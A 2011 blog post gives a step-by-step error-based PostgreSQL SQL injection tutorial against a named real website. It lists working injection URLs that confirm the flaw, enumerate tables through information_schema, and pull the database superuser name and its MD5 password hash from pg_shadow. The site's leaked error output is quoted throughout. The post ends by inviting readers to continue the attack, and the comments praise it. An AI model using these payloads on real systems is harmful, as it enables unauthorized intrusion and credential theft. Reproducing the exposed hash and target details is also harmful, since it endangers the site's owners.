Monday, May 30, 2011

Error Based PosgreSQL Injection

This is a demo on how to attack a website with error based Posgresql Injection. I take from my 0day web apps that just published as an example.


our victim is
http://www.creatop.com.cn
try to put ' at the url.
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80'
The output
Code:
ERROR: syntax error at or near "''"

When I try to use
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=1
it will return TRUE page. while when i'm using
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=0
FALSE page replied.

So, I know this is either blind sql or error based sql.
I try using error based method.

Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)
Owh Lucky!! it works! Posgresql!

So proceed to get the table name.
Same like we injecting other vulnerable website,posgresql is quite similar.In Posgresql error based,all sql query must be in this form
Code:
cast((your sql command/query) as int)
So, to get the table name we use cast((select table_name from information_schema.tables limit 1 offset 0) as int) what do we get??
Code:
ERROR: invalid input syntax for integer: "pg_type"
one of the table_name is pg_type"
We try to check other table_name by increasing the offset number.
So I know there is pg_user and pg_shadow table. I try to get the data from pg_shadow
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select usename from pg_shadow limit 1 offset 0) as int)
Code:
ERROR: invalid input syntax for integer: "postgres"
the usename is postgres
How about the passwd??
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select passwd from pg_shadow limit 1 offset 0) as int)
Code:
ERROR: invalid input syntax for integer: "md5caa5a31e69edef35ea15e2db062836a7"

there you are..we already get the passwd hash!
Then u can proceed what ever u want.
I will stop at here.Else you need to explore it yourself.

References
Code:
http://hackingexpose.blogspot.com/2009/04/postgresql-error-base-sql-injection.html
http://pentestmonkey.net/blog/postgres-sql-injection-cheat-sheet/

credit to : p0pc0rn 


2 comments:

Anonymous said...

nice .thanks for da tutorial bro

3ndl3ssly said...

Thanks..a good method one

Post a Comment